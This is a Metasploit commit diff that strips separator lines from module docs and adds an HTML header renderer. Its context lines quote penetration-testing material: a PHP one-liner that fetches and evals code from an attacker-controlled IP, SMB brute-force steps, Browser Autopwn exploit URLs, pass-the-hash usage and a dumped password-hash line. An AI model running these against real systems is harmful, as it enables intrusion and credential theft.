Auto <hr>

2016-03-08 11:25:15 -06:00 · 2016-03-08 11:25:15 -06:00 · 698f425821
parent b91ee232ff
commit 698f425821
8 changed files with 4 additions and 52 deletions
--- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
+++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
@ -33,16 +33,12 @@ loaded.

 ## Vulnerable Application

---
-
 To download the vulnerable application, you can find it here:

 https://tomcat.apache.org/whichversion.html

 ## Verification Steps

---
-
 1. Do: ```auxiliary/scanner/http/tomcat_mgr_login```
 2. Do: ```set RHOSTS [IP]```
 3. Set TARGETURI if necessary.
--- a/documentation/modules/auxiliary/scanner/smb/smb_login.md
+++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md
@ -4,14 +4,10 @@ and log into more machines.

 ## Vulnerable Application

---
-
 To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1.

 ## Verification Steps

---
-
 The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB:

 ```
@ -46,8 +42,6 @@ msf auxiliary(smb_login)

 ## Options

---
-
 By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will
 also need to supply user names and passwords. The following options are available to support
 different credential formats:
--- a/documentation/modules/auxiliary/server/browser_autopwn2.md
+++ b/documentation/modules/auxiliary/server/browser_autopwn2.md
@ -3,8 +3,6 @@ feel different for you. Here are the features you should know about before using

 ## Vulnerable Applications

---
-
 Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

 * Internet Explorer
@ -16,8 +14,6 @@ Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins

 ## Exploit URLs

---
-
 Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL
 you should send to the targets you wish to attack.

@ -33,8 +29,6 @@ used, including the URLs.

 ## Browser Autopwn 2 Options

---
-
 **The HTMLContent Option**

 The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a
@ -143,8 +137,6 @@ set ExploitReloadTimeout 5000

 ## Scenarios

---
-
 By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use
 different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to
 test a specific application, basically all you need to do is setting the
@ -166,8 +158,6 @@ $ ./msfconsole -q -r scripts/resource/bap_flash_only.rc

 ## Logging

---
-
 In addition, when a browser connects to BAP, this link-clicking event is also logged to the
 database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also
 save the exploit list information so that after testing you can go back to the database and see
--- a/documentation/modules/exploit/multi/script/web_delivery.md
+++ b/documentation/modules/exploit/multi/script/web_delivery.md
@ -11,8 +11,6 @@ say the target supports Powershell.

 ## Verification Steps

---
-
 To be able to use web_delivery, you must gain access to the target machine first, with the ability
 to execute either the Python, or PHP, or Powershell interpreter.

@ -46,8 +44,6 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/

 ## Targets

---
-
 **Python**

 Python is a fairly popular language, especially on unix-based systems. For example, it comes with
@ -65,8 +61,6 @@ don't come with it by default, but it is still possible to see it installed on a

 ## Scenarios

---
-
 **Against a compromised web application**

 web_delivery would work nicely for a web application with a command execution vulnerability.
--- a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md
+++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md
@ -9,8 +9,6 @@ vulnerable code path, not just passively.

 ## Vulnerable Application

---
-
 This exploit works against a vulnerable SMB service from one of these Windows systems:

 * Windows 2000
@ -22,20 +20,14 @@ the system's patch level, or use a vulnerability check.

 ## Verification Steps

---
-
 Please see Basic Usage under Overview.

 ## Options

---
-
 Please see Required Options under Overview.

 ## Scenarios

---
-
 **Failure to detect the language pack**

 On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this
--- a/documentation/modules/exploit/windows/smb/psexec.md
+++ b/documentation/modules/exploit/windows/smb/psexec.md
@ -9,8 +9,6 @@ you normally would with any Metasploit exploits.

 ## Vulnerable Application

---
-
 To be able to use exploit/windows/smb/psexec, you must meet these requirements:

 1. You have a valid username/password.
@ -20,8 +18,6 @@ To be able to use exploit/windows/smb/psexec, you must meet these requirements:

 ## Verification Steps

---
-
 At the minimum, you should be able use psexec to get a session with a valid credential:

 ```
@ -50,8 +46,6 @@ meterpreter >

 ## Options

---
-
 By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to
 go. But in reality, you will probably need to at least configure:

@ -65,8 +59,6 @@ This can be either the plain text version, or the Windows hash.

 ## Scenarios

---
-

 **Pass the Hash**

--- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md
+++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md
@ -9,8 +9,6 @@ windows/meterpreter/reverse_tcp is also the default payload for all Windows expl

 ## Vulnerable Application

---
-
 This Meterpreter payload is suitable for the following environments:

 * Windows x64
@ -18,8 +16,6 @@ This Meterpreter payload is suitable for the following environments:

 ## Verification Steps

---
-
 windows/meterpreter/reverse_tcp is typically used in two different ways.

 First, it is typically used as a payload for an exploit. Here's how to do that:
@ -43,8 +39,6 @@ as an executable:

 ## Important Basic Commands

---
-
 **pwd command**

 The ```pwd``` command allows you to see the current directory you're in on the remote target.
@ -281,8 +275,6 @@ SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b2056

 ## Scenarios

---
-
 **Setting up for Testing**

 For testing purposes, if you're tired of manually generating a payload and starting a multi handler
@ -683,8 +675,6 @@ To learn more about this, please read this [documentation](https://github.com/ra

 ## Using the Post Exploitation API in IRB

---
-
 To enter IRB, at the Meterpreter prompt, do like the following:

 ```
--- a/lib/msf/util/document_generator/normalizer.rb
+++ b/lib/msf/util/document_generator/normalizer.rb
@ -24,6 +24,10 @@ module Redcarpet
        end
      end

+      def header(text, header_level)
+        %Q|<h#{header_level}>#{text}</h#{header_level}><hr>|
+      end
+
    end
  end
 end